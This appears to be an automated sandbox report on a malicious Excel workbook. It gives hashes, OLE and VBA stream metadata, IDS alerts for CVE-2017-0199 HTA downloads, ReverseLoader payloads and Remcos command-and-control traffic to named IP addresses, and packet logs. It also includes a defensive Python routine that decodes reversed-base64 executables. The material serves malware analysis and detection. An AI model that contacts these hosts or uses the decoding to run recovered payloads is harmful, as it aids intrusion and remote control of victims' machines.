SSDEEP:12288:9SmzHJEUiOIBUzMTSnD3DERnLRmF8DhEPSxpsAQx1Zj+jTEPIrVQWvVk8B3uTVet:3Ba2bARM8A88Z+jyIrq8B3uQ3tJI0X
MD5:303CEC408CD730A7F55F5D2CD92B6B46
SHA1:E3AF855994FB94348A2241D0DDD55475B7EBBA72
SHA-256:D0214DD3F04DE57FC1A1835E3E4F0624F3DC2C876800F190E96E5D94EDE69BD6
SHA-512:7F99DEA49AC91BBE416136F0E0E5FD96A4E88E89BF6BD699E88BCAA8334DE577233FEEB3FFC8DDDA2A1B631D5F6E25DC06A1D96E1CE2CDCDE185B222057D2649
Malicious:true
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Dec 3 13:01:13 2024, Security: 1
Category:dropped
Size (bytes):988160
Entropy (8bit):7.7587349199950895
Encrypted:false
SSDEEP:12288:9SmzHJEUiOIBUzMTSnD3DERnLRmF8DhEPSxpsAQx1Zj+jTEPIrVQWvVk8B3uTVet:3Ba2bARM8A88Z+jyIrq8B3uQ3tJI0X
MD5:303CEC408CD730A7F55F5D2CD92B6B46
SHA1:E3AF855994FB94348A2241D0DDD55475B7EBBA72
SHA-256:D0214DD3F04DE57FC1A1835E3E4F0624F3DC2C876800F190E96E5D94EDE69BD6
SHA-512:7F99DEA49AC91BBE416136F0E0E5FD96A4E88E89BF6BD699E88BCAA8334DE577233FEEB3FFC8DDDA2A1B631D5F6E25DC06A1D96E1CE2CDCDE185B222057D2649
Malicious:false
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):26
Entropy (8bit):3.95006375643621
Encrypted:false
SSDEEP:3:ggPYV:rPYV
MD5:187F488E27DB4AF347237FE461A079AD
SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:false
Preview:[ZoneTransfer]....ZoneId=0
File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Dec 3 10:44:25 2024, Security: 1
Entropy (8bit):7.740151525019643
TrID:
• Microsoft Excel sheet (30009/1) 47.99%
• Microsoft Excel sheet (alternate) (24509/1) 39.20%
• Generic OLE2 / Multistream Compound File (8008/1) 12.81%
File name:0200011080.xls
File size:997'376 bytes
MD5:bd6ddad63fc3c23331d2a7fd5ee23c06
SHA1:49faa91ee8dd7d5e4484291afa6e1e5bbd0c5b08
SHA256:6442a471211f88890f7d98021a2b478a872e1f5e6053a1f52fbd65da97755fbb
SHA512:b3e126d38ea54f5ba5014310ad98301a157859907197ba2d96e16c2b9515d37d45456c218c547b2f629381cd1feaaeaf2c979be936b3e4afa2c6fc2ca74d7351
SSDEEP:12288:6mzHJEUiOIBUzMTSGD3DERnLRmF8DREPXxpsAQx1Zj+jMEP706By9T/avncgxx6P:9BafbARM8YX8Z+jz7vBy9T/8cgD6g2
TLSH:0C25F1D1B28DAB12DA45023579F387AE1721AC13D912467B33F8731E6AF7AD08503F96
Icon Hash:276ea3a6a6b7bfbf
Document Type:OLE
Number of OLE Files:1
Has Summary Info:
Application Name:Microsoft Excel
Encrypted Document:True
Contains Word Document Stream:False
Contains Workbook/Book Stream:True
Contains PowerPoint Document Stream:False
Contains Visio Document Stream:False
Contains ObjectPool Stream:False
Flash Objects Count:0
Contains VBA Macros:True
Code Page:1252
Author:
Last Saved By:
Create Time:2006-09-16 00:00:00
Last Saved Time:2024-12-03 10:44:25
Creating Application:Microsoft Excel
Security:1
Document Code Page:1252
Thumbnail Scaling Desired:False
Contains Dirty Links:False
Shared Document:False
Changed Hyperlinks:False
Application Version:786432
General
Stream Path:MBD001F7C6B/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet1
VBA File Name:Sheet1.cls
Stream Size:977
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

General
Stream Path:MBD001F7C6B/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet2
VBA File Name:Sheet2.cls
Stream Size:977
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

General
Stream Path:MBD001F7C6B/MBD007203CB/_VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA File Name:ThisWorkbook.cls
Stream Size:985
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

General
Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
VBA File Name:Sheet1.cls
Stream Size:977
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

General
Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
VBA File Name:Sheet2.cls
Stream Size:977
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

General
Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
VBA File Name:Sheet3.cls
Stream Size:977
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

General
Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA File Name:ThisWorkbook.cls
Stream Size:985
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


General
Stream Path: \x1CompObj
CLSID:
File Type: data
Stream Size: 114
Entropy: 4.25248375192737
Base64 Encoded: True
General
Stream Path: \x5DocumentSummaryInformation
CLSID:
File Type: data
Stream Size: 244
Entropy: 2.889430592781307
Base64 Encoded: False
General
Stream Path: \x5SummaryInformation
CLSID:
File Type: data
Stream Size: 200
Entropy: 3.2920681057018664
Base64 Encoded: False
General
Stream Path: MBD001F7C6B/\x1CompObj
CLSID:
File Type: data
Stream Size: 114
Entropy: 4.25248375192737
Base64 Encoded: True
General
Stream Path: MBD001F7C6B/\x5DocumentSummaryInformation
CLSID:
File Type: data
Stream Size: 244
Entropy: 2.701136490257069
Base64 Encoded: False
General
Stream Path: MBD001F7C6B/\x5SummaryInformation
CLSID:
File Type: data
Stream Size: 220
Entropy: 3.372234242231489
Base64 Encoded: False
General
Stream Path: MBD001F7C6B/MBD0018D4CE/\x1Ole
CLSID:
File Type: data
Stream Size: 20
Entropy: 0.5689955935892812
Base64 Encoded: False
Data Raw: 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
General
Stream Path: MBD001F7C6B/MBD0018D4CE/\x3ObjInfo
CLSID:
File Type: data
Stream Size: 4
Entropy: 0.8112781244591328
Base64 Encoded: False
Data Raw: 00 00 03 00
General
Stream Path: MBD001F7C6B/MBD0018D4CE/Contents
CLSID:
File Type: Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
Stream Size: 197671
Entropy: 6.989042939766534
Base64 Encoded: True
General
Stream Path: MBD001F7C6B/MBD0068D442/\x1CompObj
CLSID:
File Type: data
Stream Size: 114
Entropy: 4.219515110876372
Base64 Encoded: False
General
Stream Path: MBD001F7C6B/MBD0068D442/Package
CLSID:
File Type: Microsoft Excel 2007+
Stream Size: 26243
Entropy: 7.635433729726103
Base64 Encoded: True
General
Stream Path: MBD001F7C6B/MBD007203CB/\x1CompObj
CLSID:
File Type: data
Stream Size: 114
Entropy: 4.25248375192737
Base64 Encoded: True
General
Stream Path: MBD001F7C6B/MBD007203CB/\x5DocumentSummaryInformation
CLSID:
File Type: data
Stream Size: 248
Entropy: 3.0523231150355867
Base64 Encoded: False
General
Stream Path:MBD001F7C6B/MBD007203CB/\x5SummaryInformation
CLSID:
File Type:data
Stream Size:256
Entropy:4.086306928392587
Base64 Encoded:True
General
Stream Path:MBD001F7C6B/MBD007203CB/Workbook
CLSID:
File Type:Applesoft BASIC program data, first line number 16
Stream Size:134792
Entropy:7.974168320310173
Base64 Encoded:True
General
Stream Path:MBD001F7C6B/MBD007203CB/_VBA_PROJECT_CUR/PROJECT
CLSID:
File Type:ASCII text, with CRLF line terminators
Stream Size:468
Entropy:5.269289820125323
Base64 Encoded:True
General
Stream Path:MBD001F7C6B/MBD007203CB/_VBA_PROJECT_CUR/PROJECTwm
CLSID:
File Type:data
Stream Size:83
Entropy:3.0672749060249043
Base64 Encoded:False
General
Stream Path:MBD001F7C6B/MBD007203CB/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
CLSID:
File Type:data
Stream Size:2486
Entropy:3.9244127831265385
Base64 Encoded:False
General
Stream Path:MBD001F7C6B/MBD007203CB/_VBA_PROJECT_CUR/VBA/dir
CLSID:
File Type:data
Stream Size:536
Entropy:6.330646364694152
Base64 Encoded:True
General
Stream Path:MBD001F7C6B/MBD00726B69/\x1CompObj
CLSID:
File Type:data
Stream Size:114
Entropy:4.219515110876372
Base64 Encoded:False
General
Stream Path:MBD001F7C6B/MBD00726B69/Package
CLSID:
File Type:Microsoft Excel 2007+
Stream Size:26242
Entropy:7.635424485665502
Base64 Encoded:True
General
Stream Path:MBD001F7C6B/Workbook
CLSID:
File Type:Applesoft BASIC program data, first line number 16
Stream Size:283872
Entropy:7.743278150467805
Base64 Encoded:True
General
Stream Path:MBD001F7C6C/\x1Ole
CLSID:
File Type:data
Stream Size:936
Entropy:5.16390902871293
Base64 Encoded:False
General
Stream Path:Workbook
CLSID:
File Type:Applesoft BASIC program data, first line number 16
Stream Size:291651
Entropy:7.998399897768445
Base64 Encoded:True
General
Stream Path:_VBA_PROJECT_CUR/PROJECT
CLSID:
File Type:ASCII text, with CRLF line terminators
Stream Size:523
Entropy:5.257044322223331
Base64 Encoded:True
                                                                                                                                                                                  Data ASCII:I D = " { 9 9 6 B 1 C A 2 - 5 2 3 1 - 4 E 8 1 - A 6 5 5 - 8 A C 1 F 3 D 6 F 6 B A } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D D D F 3 7 1 2 C 9 E 9 C D E 9 C
                                                                                                                                                                                  Data Raw:49 44 3d 22 7b 39 39 36 42 31 43 41 32 2d 35 32 33 31 2d 34 45 38 31 2d 41 36 35 35 2d 38 41 43 31 46 33 44 36 46 36 42 41 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                                                                                                                                                  General
                                                                                                                                                                                  Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                                                                                                                                  CLSID:
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Stream Size:104
                                                                                                                                                                                  Entropy:3.0488640812019017
                                                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                                                  Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                                                                                                                                                  Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                                                                                                                                                                  General
                                                                                                                                                                                  Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                                                                                                                                  CLSID:
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Stream Size:2644
                                                                                                                                                                                  Entropy:3.9812271968824864
                                                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                                                  Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                                                                                                                                                  Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                                                                                                                                                  General
                                                                                                                                                                                  Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                                                                                                                                                  CLSID:
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Stream Size:553
                                                                                                                                                                                  Entropy:6.356548309146614
                                                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                                                  Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . z b i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
                                                                                                                                                                                  Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 b9 7a 62 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-03T14:00:52.957814+0100 | 2057635 | ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound | 1 | 142.93.65.161 | 80 | 192.168.2.22 | 49177 | TCP
2024-12-03T14:00:52.957814+0100 | 2858295 | ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) | 1 | 142.93.65.161 | 80 | 192.168.2.22 | 49177 | TCP
2024-12-03T14:00:57.033411+0100 | 2024449 | ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl | 1 | 192.168.2.22 | 49166 | 142.93.65.161 | 80 | TCP
2024-12-03T14:00:57.033630+0100 | 2024197 | ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) | 1 | 142.93.65.161 | 80 | 192.168.2.22 | 49166 | TCP
2024-12-03T14:01:01.567076+0100 | 2024449 | ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl | 1 | 192.168.2.22 | 49168 | 142.93.65.161 | 80 | TCP
2024-12-03T14:01:01.567149+0100 | 2024197 | ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) | 1 | 142.93.65.161 | 80 | 192.168.2.22 | 49168 | TCP
2024-12-03T14:01:11.531099+0100 | 2858795 | ETPRO MALWARE ReverseLoader Payload Request (GET) M2 | 1 | 192.168.2.22 | 49169 | 142.93.65.161 | 80 | TCP
2024-12-03T14:01:23.117892+0100 | 2024449 | ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl | 1 | 192.168.2.22 | 49175 | 142.93.65.161 | 80 | TCP
2024-12-03T14:01:38.675522+0100 | 2049038 | ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 | 1 | 151.101.65.137 | 443 | 192.168.2.22 | 49176 | TCP
2024-12-03T14:01:39.948886+0100 | 2858796 | ETPRO MALWARE ReverseLoader Payload Request (GET) M1 | 1 | 192.168.2.22 | 49177 | 142.93.65.161 | 80 | TCP
2024-12-03T14:01:40.318974+0100 | 2020424 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 | 1 | 142.93.65.161 | 80 | 192.168.2.22 | 49177 | TCP
2024-12-03T14:01:40.318974+0100 | 2020425 | ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 | 1 | 142.93.65.161 | 80 | 192.168.2.22 | 49177 | TCP
2024-12-03T14:01:43.467133+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.22 | 49178 | 31.13.224.72 | 4044 | TCP
2024-12-03T14:01:45.963112+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.22 | 49179 | 31.13.224.72 | 4044 | TCP
2024-12-03T14:01:46.425588+0100 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.22 | 49180 | 178.237.33.50 | 80 | TCP
2024-12-03T14:01:53.979899+0100 | 2858796 | ETPRO MALWARE ReverseLoader Payload Request (GET) M1 | 1 | 192.168.2.22 | 49181 | 142.93.65.161 | 80 | TCP
2024-12-03T14:01:54.412303+0100 | 2020424 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 | 1 | 142.93.65.161 | 80 | 192.168.2.22 | 49181 | TCP
2024-12-03T14:01:54.412303+0100 | 2020425 | ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 | 1 | 142.93.65.161 | 80 | 192.168.2.22 | 49181 | TCP
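The alert names above (SIDs 2057635, 2858295 and 2020425) describe a ReverseLoader-style second stage: a PE that is base64-encoded, character-reversed, and served over plain HTTP with a text/plain content type. The following Python is an added example, not part of the Joe Sandbox report and not the content of any ET rule; it shows how an analyst can triage such a body offline and recover the executable from it. The PE blob it works on is constructed in the script (a bare DOS header plus a PE signature, not a real executable), and the encoding scheme is assumed from the rule names rather than taken from the rules themselves.

```python
import base64
import binascii
import struct
from typing import Optional


def build_fake_pe() -> bytes:
    """Constructed stand-in for a PE: MZ header, e_lfanew at 0x3C pointing
    at a 'PE\\0\\0' signature. Only enough structure for header checks."""
    e_lfanew = 0x40
    blob = bytearray(b"MZ\x90\x00" + b"\x00" * (0x3C - 4))  # DOS header up to e_lfanew
    blob += struct.pack("<I", e_lfanew)                      # e_lfanew
    blob += b"PE\x00\x00" + b"\x00" * 20                     # signature + IMAGE_FILE_HEADER placeholder
    return bytes(blob)


def reverse_loader_encode(pe: bytes) -> str:
    """Produce the body shape the alert names imply (assumed scheme):
    base64 of the executable, then the text reversed character by character."""
    return base64.b64encode(pe).decode("ascii")[::-1]


def is_pe(blob: bytes) -> bool:
    """Header-level PE check: 'MZ' at offset 0 and 'PE\\0\\0' at e_lfanew."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", blob, 0x3C)
    return blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def quick_triage(body: str) -> bool:
    """Stream-level heuristic in the spirit of the IDS rule: 'MZ' always
    base64-encodes to 'TV...', so a reversed base64 PE ends in '...VT'.
    Cheap, but confirm with recover_pe() before acting on it."""
    return body.strip().endswith("VT")


def recover_pe(body: str) -> Optional[bytes]:
    """Try the plain and the reversed base64 reading of an HTTP body and
    return the decoded bytes only when they carry a valid MZ/PE header pair."""
    cleaned = "".join(body.split())  # tolerate line-wrapped bodies
    for candidate in (cleaned, cleaned[::-1]):
        try:
            blob = base64.b64decode(candidate, validate=True)
        except (binascii.Error, ValueError):
            continue  # not valid base64 in this orientation
        if is_pe(blob):
            return blob
    return None


if __name__ == "__main__":
    pe = build_fake_pe()
    body = reverse_loader_encode(pe)
    print("triage hit:", quick_triage(body))
    recovered = recover_pe(body)
    print("recovered PE:", recovered is not None and recovered == pe)
```

In a real investigation the body comes from the PCAP (here the 142.93.65.161:80 responses to client ports 49177 and 49181) rather than from build_fake_pe(); the recovered bytes should then be hashed and handed to a PE parser, since a correct header pair says nothing about the rest of the file.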
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 3, 2024 14:00:53.307441950 CET | 49165 | 443 | 192.168.2.22 | 54.150.207.131
Dec 3, 2024 14:00:53.307503939 CET | 443 | 49165 | 54.150.207.131 | 192.168.2.22
Dec 3, 2024 14:00:53.307591915 CET | 49165 | 443 | 192.168.2.22 | 54.150.207.131
Dec 3, 2024 14:00:53.314553976 CET | 49165 | 443 | 192.168.2.22 | 54.150.207.131
Dec 3, 2024 14:00:53.314568043 CET | 443 | 49165 | 54.150.207.131 | 192.168.2.22
Dec 3, 2024 14:00:54.954140902 CET | 443 | 49165 | 54.150.207.131 | 192.168.2.22
Dec 3, 2024 14:00:54.954226971 CET | 49165 | 443 | 192.168.2.22 | 54.150.207.131
Dec 3, 2024 14:00:54.960511923 CET | 49165 | 443 | 192.168.2.22 | 54.150.207.131
Dec 3, 2024 14:00:54.960530043 CET | 443 | 49165 | 54.150.207.131 | 192.168.2.22
Dec 3, 2024 14:00:54.960937977 CET | 443 | 49165 | 54.150.207.131 | 192.168.2.22
Dec 3, 2024 14:00:54.960992098 CET | 49165 | 443 | 192.168.2.22 | 54.150.207.131
Dec 3, 2024 14:00:55.199042082 CET | 49165 | 443 | 192.168.2.22 | 54.150.207.131
Dec 3, 2024 14:00:55.243338108 CET | 443 | 49165 | 54.150.207.131 | 192.168.2.22
Dec 3, 2024 14:00:55.714740992 CET | 443 | 49165 | 54.150.207.131 | 192.168.2.22
Dec 3, 2024 14:00:55.714839935 CET | 443 | 49165 | 54.150.207.131 | 192.168.2.22
Dec 3, 2024 14:00:55.714951038 CET | 49165 | 443 | 192.168.2.22 | 54.150.207.131
Dec 3, 2024 14:00:55.714951038 CET | 49165 | 443 | 192.168.2.22 | 54.150.207.131
Dec 3, 2024 14:00:55.716027021 CET | 49165 | 443 | 192.168.2.22 | 54.150.207.131
Dec 3, 2024 14:00:55.716057062 CET | 443 | 49165 | 54.150.207.131 | 192.168.2.22
Dec 3, 2024 14:00:55.731483936 CET | 49166 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:00:55.852876902 CET | 80 | 49166 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:00:55.852968931 CET | 49166 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:00:55.853151083 CET | 49166 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:00:55.973150015 CET | 80 | 49166 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:00:57.033308983 CET | 80 | 49166 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:00:57.033385992 CET | 80 | 49166 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:00:57.033411026 CET | 49166 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:00:57.033437967 CET | 49166 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:00:57.033629894 CET | 80 | 49166 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:00:57.033643007 CET | 80 | 49166 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:00:57.033668995 CET | 49166 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:00:57.033684969 CET | 49166 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:00:57.033981085 CET | 80 | 49166 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:00:57.033993959 CET | 80 | 49166 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:00:57.034006119 CET | 80 | 49166 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:00:57.034018993 CET | 49166 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:00:57.034034014 CET | 49166 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:00:57.034863949 CET | 80 | 49166 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:00:57.034924984 CET | 49166 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:00:57.034929037 CET | 80 | 49166 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:00:57.034940958 CET | 80 | 49166 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:00:57.034985065 CET | 49166 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:00:57.034985065 CET | 49166 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:00:57.042300940 CET | 49166 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:00:57.153378010 CET | 80 | 49166 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:00:57.153445959 CET | 49166 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:00:57.153548002 CET | 80 | 49166 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:00:57.153594971 CET | 49166 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:00:57.157567024 CET | 80 | 49166 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:00:57.157627106 CET | 49166 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:00:57.243369102 CET | 80 | 49166 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:00:57.243443966 CET | 49166 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:00:57.243479967 CET | 80 | 49166 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:00:57.243551016 CET | 49166 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:00:57.248032093 CET | 80 | 49166 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:00:57.248080969 CET | 80 | 49166 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:00:57.248107910 CET | 49166 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:00:57.248121023 CET | 49166 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:00:57.256716013 CET | 80 | 49166 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:00:57.256784916 CET | 49166 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:00:57.256870985 CET | 80 | 49166 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:00:57.256907940 CET | 49166 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:00:57.264723063 CET | 80 | 49166 | 142.93.65.161 | 192.168.2.22
